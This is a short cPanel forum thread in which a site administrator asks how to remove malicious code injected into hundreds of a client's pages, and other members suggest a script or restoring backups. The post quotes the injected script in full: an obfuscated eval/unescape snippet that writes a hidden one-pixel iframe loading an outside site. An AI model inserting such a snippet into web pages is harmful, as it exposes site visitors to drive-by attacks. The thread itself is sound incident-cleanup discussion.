How to clean malicious code from multiple files

deieno · Feb 17, 2011

Hi people,

on of my client was hacked and hundred of pages was inserted this malicious code:

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%76%65%72%72%65%64%2E%6E%65%74%2F%3F%35%33%31%30%38%33%39%30%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>

Do you Know a script or a regex command to clean this from all files?

Thank you

LinuxTechie · Feb 17, 2011

Hello,

First of all can you verify the pattern is same in all the infected files. If so it is easy to remove with a script.

hiben · Feb 17, 2011

The best would be to check your backups and restore from there.

Forums

The Community Forums

Interact with an entire community of cPanel & WHM users!

How to clean malicious code from multiple files

deieno Well-Known Member

LinuxTechie Well-Known Member

hiben Member

SOLVED Update does not exit cleanly with code 65280

Clean cache and detecting /home2

E Pre Maintenance ended, however it did not exit cleanly (256). (without an error)

Clean up RRD files in /var/cpanel/bandwidth

Question on DNS Clean Up

Share This Page

Useful Searches

The Community Forums

Interact with an entire community of cPanel & WHM users!

How to clean malicious code from multiple files

deieno Well-Known Member

LinuxTechie Well-Known Member

hiben Member

SOLVED Update does not exit cleanly with code 65280

Clean cache and detecting /home2

E Pre Maintenance ended, however it did not exit cleanly (256). (without an error)

Clean up RRD files in /var/cpanel/bandwidth

Question on DNS Clean Up

Share This Page